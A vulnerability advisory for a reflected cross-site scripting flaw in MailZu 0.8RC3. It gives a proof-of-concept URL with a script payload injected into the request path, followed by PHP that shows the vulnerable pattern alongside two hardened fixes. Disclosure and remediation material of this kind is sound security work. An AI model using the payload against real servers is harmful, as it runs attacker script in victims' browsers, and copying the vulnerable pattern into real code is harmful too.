[+]###################################################################################################
[+] Title: MailZu 0.8RC3 - Reflected Cross Site Scripting
[+] Credits / Discovery: Nassim Asrir
[+] Author Email: wassline@gmail.com
[+] Author Company: Henceforth
[+]###################################################################################################
 
 
 
Vendor:
===============
https://sourceforge.net/
 
 
Product:
===============
MailZu 0.8RC3
 
 
Download:
===========
https://sourceforge.net/projects/mailzu/files/mailzu/
 
 
MailZu is a simple and intuitive web interface to manage Amavisd-new quarantine. Users can view their own quarantine, release/delete messages or request the release of messages.
 
 
Vulnerability Type:
======================================
Reflected Cross Site Scripting.
 
 
 
CVE Reference:
===============
N/A
 

 
 
Tested on:
=============== 
Windows 7
Apache/2.4.23 (Win64)

 
 
 
Exploit/POC:
============
 
1) Navigate to the server: http://server/index.php
 
 
2) Inject the XSS payload into the request path: http://server/index.php/"><script>alert(1);</script>
 
 
3) Done!
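The payload above works because the request path is written back into the page unencoded. The following is an added illustration, not MailZu's own code; it assumes the sink is the script's own path (PHP_SELF / PATH_INFO) echoed into an HTML attribute such as a form action, which the advisory does not state explicitly, and shows the vulnerable pattern next to two hardened forms.

```php
<?php
// Added example, not MailZu code. Assumed sink: the request path is echoed
// into an attribute. The advisory only shows the triggering URL.

// Vulnerable pattern: the raw path, including any injected PATH_INFO, goes
// straight into the attribute. A path ending in
//   /index.php/"><script>alert(1);</script>
// closes the attribute and the tag, so the script element is rendered.
function render_form_vulnerable(string $self): string {
    return '<form method="post" action="' . $self . '">';
}

// Hardened pattern 1: encode for the HTML attribute context so quotes and
// angle brackets become entities and can no longer break out of the value.
function render_form_hardened(string $self): string {
    $safe = htmlspecialchars($self, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<form method="post" action="' . $safe . '">';
}

// Hardened pattern 2: do not reflect the request path at all; a constant
// action cannot be influenced by PATH_INFO.
function render_form_fixed(): string {
    return '<form method="post" action="index.php">';
}

// Constructed sample value matching the advisory's payload.
$self = '/index.php/"><script>alert(1);</script>';
echo render_form_vulnerable($self), PHP_EOL; // injected markup left intact
echo render_form_hardened($self), PHP_EOL;   // markup neutralised as entities
echo render_form_fixed(), PHP_EOL;           // path never reaches the output
```

Pattern 2 is the simpler fix for a fixed-name script; pattern 1 is the general rule for any request-derived value placed inside an attribute.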
 
 
 
Network Access:
===============
Remote
 
 
 
Impact:
=================
Execution of attacker-supplied script in the browser of any user who opens the crafted link
 
 
 
Severity:
===========
High
 
 
Disclosure Timeline:
=====================
January 18, 2017 : Public Disclosure